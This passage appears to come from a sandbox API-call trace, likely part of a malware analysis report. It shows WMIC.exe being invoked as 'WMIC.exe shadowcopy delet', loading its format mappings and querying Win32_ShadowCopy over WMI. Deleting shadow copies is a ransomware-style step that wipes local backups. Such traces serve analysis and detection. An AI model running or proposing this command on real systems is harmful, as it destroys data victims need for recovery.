hKey=0x1ac, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x882c80, lpcbData=0x69f698*=0x42 | out: lpType=0x0, lpData=0x882c80*=0x25, lpcbData=0x69f698*=0x42) returned 0x0 [0161.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0161.957] malloc (_Size=0x42) returned 0x889770 [0161.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0161.957] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x69f69c, lpcbData=0x69f698*=0x400 | out: lpType=0x0, lpData=0x69f69c*=0x36, lpcbData=0x69f698*=0xc) returned 0x0 [0161.957] _wtol (_String="65536") returned 65536 [0161.957] free (_Block=0x882c80) [0161.957] RegCloseKey (hKey=0x0) returned 0x6 [0161.957] CoCreateInstance (in: rclsid=0xe66ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x69fb2c | out: ppv=0x69fb2c*=0x9e45a8) returned 0x0 [0162.398] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x9e45a8, xmlSource=0x69fab0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x69fb18 | out: isSuccessful=0x69fb18*=0xffff) returned 0x0 [0163.593] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x9e45a8, DOMElement=0x69fb28 | out: DOMElement=0x69fb28) returned 0x0 [0163.593] malloc (_Size=0xc) returned 0x8896e0 [0163.593] free (_Block=0x8896e0) [0163.594] malloc (_Size=0xc) returned 0x889620 [0163.594] free (_Block=0x889620) [0163.594] malloc (_Size=0xc) returned 0x889638 [0163.594] malloc (_Size=0xc) returned 0x889608 [0163.594] malloc (_Size=0x18) returned 0x882c20 [0163.595] malloc (_Size=0xc) returned 0x889710 [0163.595] free (_Block=0x889710) [0163.595] malloc (_Size=0xc) returned 0x889698 [0163.595] malloc (_Size=0xc) returned 0x889590 [0163.595] SysStringLen (param_1="VALUE") returned 0x5 [0163.595] SysStringLen (param_1="TABLE") returned 0x5 [0163.595] SysStringLen (param_1="TABLE") returned 0x5 [0163.595] SysStringLen (param_1="VALUE") returned 0x5 [0163.595] malloc (_Size=0x18) returned 0x8828e0 [0163.595] malloc (_Size=0xc) returned 0x8896c8 [0163.595] free (_Block=0x8896c8) [0163.596] malloc (_Size=0xc) returned 0x8895f0 [0163.596] malloc (_Size=0xc) returned 0x8896f8 [0163.596] SysStringLen (param_1="LIST") returned 0x4 [0163.596] SysStringLen (param_1="TABLE") returned 0x5 [0163.596] malloc (_Size=0x18) returned 0x882a20 [0163.596] malloc (_Size=0xc) returned 0x889710 [0163.596] free (_Block=0x889710) [0163.596] malloc (_Size=0xc) returned 0x889620 [0163.596] malloc (_Size=0xc) returned 0x889668 [0163.596] SysStringLen (param_1="RAWXML") returned 0x6 [0163.596] SysStringLen (param_1="TABLE") returned 0x5 [0163.596] SysStringLen (param_1="RAWXML") returned 0x6 [0163.596] SysStringLen (param_1="LIST") returned 0x4 [0163.596] SysStringLen (param_1="LIST") returned 0x4 [0163.596] SysStringLen (param_1="RAWXML") returned 0x6 [0163.596] malloc (_Size=0x18) returned 0x882980 [0163.597] malloc (_Size=0xc) returned 0x889710 [0163.597] free (_Block=0x889710) [0163.597] malloc (_Size=0xc) returned 0x889758 [0163.597] malloc (_Size=0xc) returned 0x8896b0 [0163.597] SysStringLen (param_1="HTABLE") returned 0x6 [0163.597] SysStringLen (param_1="TABLE") returned 0x5 [0163.597] SysStringLen (param_1="HTABLE") returned 0x6 [0163.597] SysStringLen (param_1="LIST") returned 0x4 [0163.597] malloc (_Size=0x18) returned 0x882ac0 [0163.597] malloc (_Size=0xc) returned 0x889650 [0163.597] free (_Block=0x889650) [0163.598] malloc (_Size=0xc) returned 0x8895a8 [0163.598] malloc (_Size=0xc) returned 0x8896e0 [0163.598] SysStringLen (param_1="HFORM") returned 0x5 [0163.598] SysStringLen (param_1="TABLE") returned 0x5 [0163.598] SysStringLen (param_1="HFORM") returned 0x5 [0163.598] SysStringLen (param_1="LIST") returned 0x4 [0163.598] SysStringLen (param_1="HFORM") returned 0x5 [0163.598] SysStringLen (param_1="HTABLE") returned 0x6 [0163.598] malloc (_Size=0x18) returned 0x882c40 [0163.598] malloc (_Size=0xc) returned 0x8896c8 [0163.598] free (_Block=0x8896c8) [0163.598] malloc (_Size=0xc) returned 0x8896c8 [0163.598] malloc (_Size=0xc) returned 0x889710 [0163.598] SysStringLen (param_1="XML") returned 0x3 [0163.598] SysStringLen (param_1="TABLE") returned 0x5 [0163.598] SysStringLen (param_1="XML") returned 0x3 [0163.598] SysStringLen (param_1="VALUE") returned 0x5 [0163.598] SysStringLen (param_1="VALUE") returned 0x5 [0163.598] SysStringLen (param_1="XML") returned 0x3 [0163.598] malloc (_Size=0x18) returned 0x882c60 [0163.599] malloc (_Size=0xc) returned 0x8895c0 [0163.599] free (_Block=0x8895c0) [0163.599] malloc (_Size=0xc) returned 0x8895c0 [0163.599] malloc (_Size=0xc) returned 0x8895d8 [0163.599] SysStringLen (param_1="MOF") returned 0x3 [0163.599] SysStringLen (param_1="TABLE") returned 0x5 [0163.599] SysStringLen (param_1="MOF") returned 0x3 [0163.599] SysStringLen (param_1="LIST") returned 0x4 [0163.599] SysStringLen (param_1="MOF") returned 0x3 [0163.599] SysStringLen (param_1="RAWXML") returned 0x6 [0163.599] SysStringLen (param_1="LIST") returned 0x4 [0163.599] SysStringLen (param_1="MOF") returned 0x3 [0163.599] malloc (_Size=0x18) returned 0x882aa0 [0163.600] malloc (_Size=0xc) returned 0x889650 [0163.600] free (_Block=0x889650) [0163.600] malloc (_Size=0xc) returned 0x889728 [0163.600] malloc (_Size=0xc) returned 0x889650 [0163.600] SysStringLen (param_1="CSV") returned 0x3 [0163.600] SysStringLen (param_1="TABLE") returned 0x5 [0163.600] SysStringLen (param_1="CSV") returned 0x3 [0163.600] SysStringLen (param_1="LIST") returned 0x4 [0163.600] SysStringLen (param_1="CSV") returned 0x3 [0163.600] SysStringLen (param_1="HTABLE") returned 0x6 [0163.600] SysStringLen (param_1="CSV") returned 0x3 [0163.600] SysStringLen (param_1="HFORM") returned 0x5 [0163.600] malloc (_Size=0x18) returned 0x882900 [0163.600] malloc (_Size=0xc) returned 0x889740 [0163.600] free (_Block=0x889740) [0163.601] malloc (_Size=0xc) returned 0x889740 [0163.601] malloc (_Size=0xc) returned 0x88abc8 [0163.601] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.601] SysStringLen (param_1="TABLE") returned 0x5 [0163.601] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.601] SysStringLen (param_1="VALUE") returned 0x5 [0163.601] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.601] SysStringLen (param_1="XML") returned 0x3 [0163.601] SysStringLen (param_1="XML") returned 0x3 [0163.601] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.601] malloc (_Size=0x18) returned 0x882a40 [0163.601] malloc (_Size=0xc) returned 0x88abe0 [0163.601] free (_Block=0x88abe0) [0163.601] malloc (_Size=0xc) returned 0x88a9e8 [0163.601] malloc (_Size=0xc) returned 0x88abe0 [0163.601] SysStringLen (param_1="texttablewsys") returned 0xd [0163.601] SysStringLen (param_1="TABLE") returned 0x5 [0163.601] SysStringLen (param_1="texttablewsys") returned 0xd [0163.601] SysStringLen (param_1="XML") returned 0x3 [0163.602] SysStringLen (param_1="texttablewsys") returned 0xd [0163.602] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.602] SysStringLen (param_1="XML") returned 0x3 [0163.602] SysStringLen (param_1="texttablewsys") returned 0xd [0163.602] malloc (_Size=0x18) returned 0x882920 [0163.602] malloc (_Size=0xc) returned 0x88aa00 [0163.602] free (_Block=0x88aa00) [0163.602] malloc (_Size=0xc) returned 0x88abb0 [0163.602] malloc (_Size=0xc) returned 0x88a9a0 [0163.602] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.602] SysStringLen (param_1="TABLE") returned 0x5 [0163.602] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.602] SysStringLen (param_1="XML") returned 0x3 [0163.602] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.602] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.602] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.602] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.602] malloc (_Size=0x18) returned 0x882940 [0163.603] malloc (_Size=0xc) returned 0x88aa30 [0163.603] free (_Block=0x88aa30) [0163.603] malloc (_Size=0xc) returned 0x88ab50 [0163.603] malloc (_Size=0xc) returned 0x88aaf0 [0163.603] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.603] SysStringLen (param_1="TABLE") returned 0x5 [0163.603] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.603] SysStringLen (param_1="XML") returned 0x3 [0163.603] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.603] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.603] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.603] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.603] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.603] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.603] malloc (_Size=0x18) returned 0x8829c0 [0163.604] malloc (_Size=0xc) returned 0x88abf8 [0163.604] free (_Block=0x88abf8) [0163.604] malloc (_Size=0xc) returned 0x88ab20 [0163.604] malloc (_Size=0xc) returned 0x88ac40 [0163.604] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.604] SysStringLen (param_1="TABLE") returned 0x5 [0163.604] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.604] SysStringLen (param_1="XML") returned 0x3 [0163.604] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.604] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.604] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.604] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.604] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.604] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.604] malloc (_Size=0x18) returned 0x8829a0 [0163.604] malloc (_Size=0xc) returned 0x88ab38 [0163.605] free (_Block=0x88ab38) [0163.605] malloc (_Size=0xc) returned 0x88ab98 [0163.605] malloc (_Size=0xc) returned 0x88abf8 [0163.605] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0163.605] SysStringLen (param_1="TABLE") returned 0x5 [0163.605] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0163.605] SysStringLen (param_1="XML") returned 0x3 [0163.605] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0163.605] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.605] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0163.605] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.605] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0163.605] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.605] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.605] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0163.605] malloc (_Size=0x18) returned 0x8828a0 [0163.605] malloc (_Size=0xc) returned 0x88ac28 [0163.606] free (_Block=0x88ac28) [0163.606] malloc (_Size=0xc) returned 0x88aa00 [0163.606] malloc (_Size=0xc) returned 0x88ac10 [0163.606] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0163.606] SysStringLen (param_1="TABLE") returned 0x5 [0163.606] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0163.606] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.606] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0163.606] SysStringLen (param_1="XML") returned 0x3 [0163.606] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0163.606] SysStringLen (param_1="texttablewsys") returned 0xd [0163.606] SysStringLen (param_1="XML") returned 0x3 [0163.606] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0163.606] malloc (_Size=0x18) returned 0x8828c0 [0163.606] malloc (_Size=0xc) returned 0x88a9b8 [0163.606] free (_Block=0x88a9b8) [0163.606] malloc (_Size=0xc) returned 0x88aac0 [0163.607] malloc (_Size=0xc) returned 0x88ab38 [0163.607] SysStringLen (param_1="htable-sortby") returned 0xd [0163.607] SysStringLen (param_1="TABLE") returned 0x5 [0163.607] SysStringLen (param_1="htable-sortby") returned 0xd [0163.607] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.607] SysStringLen (param_1="htable-sortby") returned 0xd [0163.607] SysStringLen (param_1="XML") returned 0x3 [0163.607] SysStringLen (param_1="htable-sortby") returned 0xd [0163.607] SysStringLen (param_1="texttablewsys") returned 0xd [0163.607] SysStringLen (param_1="htable-sortby") returned 0xd [0163.607] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0163.607] SysStringLen (param_1="XML") returned 0x3 [0163.607] SysStringLen (param_1="htable-sortby") returned 0xd [0163.607] malloc (_Size=0x18) returned 0x882b60 [0163.607] malloc (_Size=0xc) returned 0x88aa30 [0163.607] free (_Block=0x88aa30) [0163.607] malloc (_Size=0xc) returned 0x88aa78 [0163.607] malloc (_Size=0xc) returned 0x88a9d0 [0163.607] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0163.607] SysStringLen (param_1="TABLE") returned 0x5 [0163.608] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0163.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.608] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0163.608] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.608] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0163.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.608] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0163.608] malloc (_Size=0x18) returned 0x8829e0 [0163.608] malloc (_Size=0xc) returned 0x88a958 [0163.608] free (_Block=0x88a958) [0163.608] malloc (_Size=0xc) returned 0x88ac28 [0163.608] malloc (_Size=0xc) returned 0x88aa18 [0163.608] SysStringLen (param_1="wmiclimofformat") returned 0xf [0163.608] SysStringLen (param_1="TABLE") returned 0x5 [0163.608] SysStringLen (param_1="wmiclimofformat") returned 0xf [0163.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.608] SysStringLen (param_1="wmiclimofformat") returned 0xf [0163.608] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.608] SysStringLen (param_1="wmiclimofformat") returned 0xf [0163.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0163.608] SysStringLen (param_1="wmiclimofformat") returned 0xf [0163.609] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0163.609] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.609] SysStringLen (param_1="wmiclimofformat") returned 0xf [0163.609] malloc (_Size=0x18) returned 0x882a00 [0163.609] malloc (_Size=0xc) returned 0x88aa48 [0163.609] free (_Block=0x88aa48) [0163.609] malloc (_Size=0xc) returned 0x88aad8 [0163.609] malloc (_Size=0xc) returned 0x88ab08 [0163.609] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0163.609] SysStringLen (param_1="TABLE") returned 0x5 [0163.609] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0163.609] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.609] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0163.609] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.609] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0163.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.609] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0163.609] malloc (_Size=0x18) returned 0x882a60 [0163.610] malloc (_Size=0xc) returned 0x88aa30 [0163.610] free (_Block=0x88aa30) [0163.610] malloc (_Size=0xc) returned 0x88ab68 [0163.610] malloc (_Size=0xc) returned 0x88a958 [0163.610] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0163.610] SysStringLen (param_1="TABLE") returned 0x5 [0163.610] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0163.610] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0163.610] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0163.610] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0163.610] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0163.610] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.610] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0163.610] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0163.610] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0163.610] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0163.610] malloc (_Size=0x18) returned 0x882a80 [0163.611] FreeThreadedDOMDocument:IUnknown:Release (This=0x9e45a8) returned 0x0 [0163.611] free (_Block=0x889680) [0163.611] GetCommandLineW () returned="WMIC.exe shadowcopy delet" [0163.611] malloc (_Size=0x40) returned 0x882d08 [0163.611] memcpy_s (in: _Destination=0x882d08, _DestinationSize=0x3e, _Source=0x9f1af8, _SourceSize=0x34 | out: _Destination=0x882d08) returned 0x0 [0163.611] malloc (_Size=0xc) returned 0x88ab80 [0163.611] malloc (_Size=0xc) returned 0x88a9b8 [0163.611] malloc (_Size=0xc) returned 0x88a970 [0163.611] malloc (_Size=0xc) returned 0x88a988 [0163.611] malloc (_Size=0x80) returned 0x88ad30 [0163.611] GetLocalTime (in: lpSystemTime=0x69fadc | out: lpSystemTime=0x69fadc*(wYear=0x7e4, wMonth=0x1, wDayOfWeek=0x5, wDay=0x1f, wHour=0x3, wMinute=0x14, wSecond=0x4, wMilliseconds=0xb1)) [0163.611] _vsnwprintf (in: _Buffer=0x88ad30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x69fabc | out: _Buffer="01-31-2020T03:20:04") returned 19 [0163.611] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.611] malloc (_Size=0x26) returned 0x880568 [0163.611] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.611] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.611] malloc (_Size=0x26) returned 0x88adb8 [0163.611] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.611] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.611] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.611] malloc (_Size=0x16) returned 0x882ae0 [0163.612] lstrlenW (lpString="shadowcopy") returned 10 [0163.612] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0163.612] malloc (_Size=0x16) returned 0x882b00 [0163.612] malloc (_Size=0x4) returned 0x880598 [0163.612] free (_Block=0x0) [0163.612] free (_Block=0x882ae0) [0163.612] lstrlenW (lpString=" shadowcopy delet") returned 18 [0163.612] malloc (_Size=0xc) returned 0x88aa30 [0163.612] lstrlenW (lpString="delet") returned 5 [0163.612] _wcsicmp (_String1="delet", _String2="\"NULL\"") returned 66 [0163.612] malloc (_Size=0xc) returned 0x88aa60 [0163.612] malloc (_Size=0x8) returned 0x88ade8 [0163.612] memmove_s (in: _Destination=0x88ade8, _DestinationSize=0x4, _Source=0x880598, _SourceSize=0x4 | out: _Destination=0x88ade8) returned 0x0 [0163.612] free (_Block=0x880598) [0163.612] free (_Block=0x0) [0163.612] free (_Block=0x88aa30) [0163.612] malloc (_Size=0x8) returned 0x880598 [0163.612] lstrlenW (lpString="QUIT") returned 4 [0163.612] lstrlenW (lpString="shadowcopy") returned 10 [0163.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0163.612] lstrlenW (lpString="EXIT") returned 4 [0163.612] lstrlenW (lpString="shadowcopy") returned 10 [0163.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0163.612] free (_Block=0x880598) [0163.612] WbemLocator:IUnknown:AddRef (This=0x9f2e50) returned 0x2 [0163.612] malloc (_Size=0x8) returned 0x880598 [0163.612] lstrlenW (lpString="/") returned 1 [0163.612] lstrlenW (lpString="shadowcopy") returned 10 [0163.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0163.612] lstrlenW (lpString="-") returned 1 [0163.612] lstrlenW (lpString="shadowcopy") returned 10 [0163.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0163.612] lstrlenW (lpString="CLASS") returned 5 [0163.612] lstrlenW (lpString="shadowcopy") returned 10 [0163.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0163.613] lstrlenW (lpString="PATH") returned 4 [0163.613] lstrlenW (lpString="shadowcopy") returned 10 [0163.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0163.613] lstrlenW (lpString="CONTEXT") returned 7 [0163.613] lstrlenW (lpString="shadowcopy") returned 10 [0163.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0163.613] lstrlenW (lpString="shadowcopy") returned 10 [0163.613] malloc (_Size=0x16) returned 0x882ae0 [0163.613] lstrlenW (lpString="shadowcopy") returned 10 [0163.613] GetCurrentThreadId () returned 0x1838 [0163.613] ??0CHString@@QAE@XZ () returned 0x69fa34 [0163.613] malloc (_Size=0xc) returned 0x88aa30 [0163.613] malloc (_Size=0xc) returned 0x88aa90 [0163.613] WbemLocator:IWbemLocator:ConnectServer (in: This=0x9f2e50, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xea8540 | out: ppNamespace=0xea8540*=0xa0aeb0) returned 0x0 [0176.260] free (_Block=0x88aa90) [0176.260] free (_Block=0x88aa30) [0176.260] CoSetProxyBlanket (pProxy=0xa0aeb0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0176.260] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0176.260] GetCurrentThreadId () returned 0x1838 [0176.260] ??0CHString@@QAE@XZ () returned 0x69f9d8 [0176.260] malloc (_Size=0xc) returned 0x88aa90 [0176.260] malloc (_Size=0xc) returned 0x88aa30 [0176.260] malloc (_Size=0xc) returned 0x88aa48 [0176.261] malloc (_Size=0xc) returned 0x88aaa8 [0176.261] SysStringLen (param_1="root\\cli") returned 0x8 [0176.261] SysStringLen (param_1="\\") returned 0x1 [0176.261] malloc (_Size=0xc) returned 0x88acb8 [0176.261] SysStringLen (param_1="root\\cli\\") returned 0x9 [0176.261] SysStringLen (param_1="ms_409") returned 0x6 [0176.261] free (_Block=0x88aaa8) [0176.261] free (_Block=0x88aa48) [0176.261] free (_Block=0x88aa30) [0176.261] free (_Block=0x88aa90) [0176.261] malloc (_Size=0xc) returned 0x88aa30 [0176.261] WbemLocator:IWbemLocator:ConnectServer (in: This=0x9f2e50, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xea8544 | out: ppNamespace=0xea8544*=0xa392a8) returned 0x0 [0183.625] free (_Block=0x88aa30) [0183.625] free (_Block=0x88acb8) [0183.625] ??1CHString@@QAE@XZ () returned 0x72c565f8 [0183.625] GetCurrentThreadId () returned 0x1838 [0183.625] ??0CHString@@QAE@XZ () returned 0x69fa34 [0183.625] malloc (_Size=0xc) returned 0x88ac70 [0183.625] malloc (_Size=0xc) returned 0x88ad00 [0183.626] malloc (_Size=0xc) returned 0x88ace8 [0183.626] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0183.626] malloc (_Size=0x3a) returned 0x88b568 [0183.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe614a8, cbMultiByte=-1, lpWideCharStr=0x88b568, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0183.626] free (_Block=0x88b568) [0183.626] malloc (_Size=0xc) returned 0x88ac88 [0183.626] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0183.626] SysStringLen (param_1="shadowcopy") returned 0xa [0183.626] malloc (_Size=0xc) returned 0x88acd0 [0183.626] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0183.626] SysStringLen (param_1="'") returned 0x1 [0183.626] free (_Block=0x88ac88) [0183.626] free (_Block=0x88ace8) [0183.626] free (_Block=0x88ad00) [0183.626] free (_Block=0x88ac70) [0183.626] IWbemServices:GetObject (in: This=0xa0aeb0, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x69fa30*=0x0, ppCallResult=0x0 | out: ppObject=0x69fa30*=0xa47948, ppCallResult=0x0) returned 0x0 [0185.644] malloc (_Size=0xc) returned 0x88ac88 [0185.644] IWbemClassObject:Get (in: This=0xa47948, wszName="Target", lFlags=0, pVal=0x69fa08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69fa08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.645] free (_Block=0x88ac88) [0185.645] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0185.645] malloc (_Size=0x3e) returned 0x88b568 [0185.645] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0185.645] malloc (_Size=0xc) returned 0x88ace8 [0185.645] IWbemClassObject:Get (in: This=0xa47948, wszName="PWhere", lFlags=0, pVal=0x69fa08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69fa08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.645] free (_Block=0x88ace8) [0185.645] lstrlenW (lpString=" Where ID = '#'") returned 15 [0185.645] malloc (_Size=0x20) returned 0x88b5b0 [0185.645] lstrlenW (lpString=" Where ID = '#'") returned 15 [0185.645] malloc (_Size=0xc) returned 0x88ace8 [0185.646] IWbemClassObject:Get (in: This=0xa47948, wszName="Connection", lFlags=0, pVal=0x69fa08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69fa08*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa47ae0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0185.646] free (_Block=0x88ace8) [0185.646] IUnknown:QueryInterface (in: This=0xa47ae0, riid=0xe66a04*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69fa24 | out: ppvObject=0x69fa24*=0xa47ae0) returned 0x0 [0185.646] GetCurrentThreadId () returned 0x1838 [0185.646] ??0CHString@@QAE@XZ () returned 0x69f9a0 [0185.646] malloc (_Size=0xc) returned 0x88ad18 [0185.646] IWbemClassObject:Get (in: This=0xa47ae0, wszName="Namespace", lFlags=0, pVal=0x69f988*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x69f988*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 